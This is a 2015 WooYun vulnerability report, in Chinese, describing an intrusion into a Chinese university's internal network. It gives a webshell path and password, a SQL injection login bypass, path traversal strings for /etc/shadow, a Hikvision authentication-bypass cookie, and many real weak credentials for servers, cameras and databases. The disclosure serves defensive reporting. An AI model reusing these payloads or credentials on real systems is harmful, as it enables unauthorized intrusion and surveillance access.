漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0153027
漏洞标题:南京信息工程大学内网漫游
相关厂商:南京信息工程大学
漏洞作者: Jyhtpy
提交时间:2015-11-09 17:16
修复时间:2015-11-22 14:08
公开时间:2015-11-22 14:08
漏洞类型:服务弱口令
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
由于某系统存在的问题,导致进入到内网。
简单的测试了一下。
详细说明:
首先是这个http://**.**.**.**/bugs/wooyun-2010-061930
发现http://**.**.**.**/nxdsy/
过程不多说
shell地址
http://**.**.**.**/nxdsy/upfiles/news/test.asp 密码cmd
发现已被加后门
ping一下内网地址是通的
然后就是主题了,以下内容请管理适当打码。
漏洞证明:
0x00
使用nmap简单探测了一下B段的存活主机
而后对各个网段进行测试
0x01 注入
**.**.**.**/Index.aspx 天气录播平台
admin'or'1'='1
可直接登录管理员
http://**.**.**.**/managerOneGgxxfb.action?fbxxid=2c90848d4834497901483f5b50bc0001
一卡通中心
0x02 任意文件读取
发现智能数据网关 存在文件读取漏洞
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
/public/../../../../../../../etc/shadow
**.**.**.**
**.**.**.**
**.**.**.**
/../../../../../../../etc/passwd
直接读取shadow文件 解密
各个网关服务器都使用相同密码
root/sg3907
拿下网关服务器
0x03 未授权访问+弱口令
**.**.**.**/gateway.html
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
虽然不知道干什么用的,不过可以直接重启机器。
另外,以上ip均存在telnet以及ftp弱口令root/root,权限很大
**.**.**.**
**.**.**.**
**.**.**.**
打印机未授权访问
0x04 目录遍历
**.**.**.**/upload/
/db/
/bin/
/db/
/images/
/reports/
/scripts/
/styles/
/upload/
/xml/
电子收费系统
挺多信息的
由于不知道为什么sqlserver未连接就没有尝试登录后台了
**.**.**.**/images/
/a/
/m/
/plus/
Dedecms的,好像是遥感院的网站
0x05 远程代码执行
**.**.**.**
**.**.**.**
**.**.**.**
IIS7 HTTP.sys远程代码执行漏洞
返回416
存在漏洞
0x06 任意文件上传
http://**.**.**.**
现在内网才能访问
详情见http://**.**.**.**/bugs/wooyun-2010-075840
得到shell
http://**.**.**.**/noticespic/sqzr20153706123742.jsp
administrator权限
似乎只对外开放80端口
不过有reDuh开个http隧道连就好
这边就不深入了
0x07 硬编码绕过
海康威视的问题
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**0
**.**.**.**
新建一个cookie为
userInfo80
/
YW5vbnltb3VzOlwxNzdcMTc3XDE3N1wxNzdcMTc3XDE3Nw==
直接访问http://ip/doc/page/main.asp
0x08 弱口令
**.**.**.**4
**.**.**.**3
**.**.**.**7
**.**.**.**5
**.**.**.**6
文德楼监控
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**-164
各个宿舍监控
海康威视默认密码12345
**.**.**.**/
Administrator/空
**.**.**.**/
打印服务器
admin/admin
**.**.**.**/
财务实验室智能家居系统
(开关灯和空调什么鬼)
admin/admin
**.**.**.**/
IBM设备
admin/admin
**.**.**.**:8080/
**.**.**.**:8080/
admin/admin
可查看宿舍进出记录
最后的最后
还有一些mssql的弱口令,可直接控制服务器
**.**.**.**(机房管理系统)
sa/123456
Administrator/1
**.**.**.**
sa/sa
**.**.**.**
sa/sa
**.**.**.**(继续教育学院)
sa/123456
**.**.**.**
sa/空
**.**.**.**
sa/空
**.**.**.**
sa/空
**.**.**.**(虚拟交易所??)
sa/sa
Administrator/emlab
**.**.**.**(公务员考试模拟系统)
sa/空
**.**.**.**
sa/空
还有两个外网地址的:
**.**.**.**
sa/空
**.**.**.**(研究生办)
sa/1
贴几个图证明一下
修复方案:
无
版权声明:转载请注明来源 Jyhtpy@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-11-22 14:08
厂商回复:
最新状态:
暂无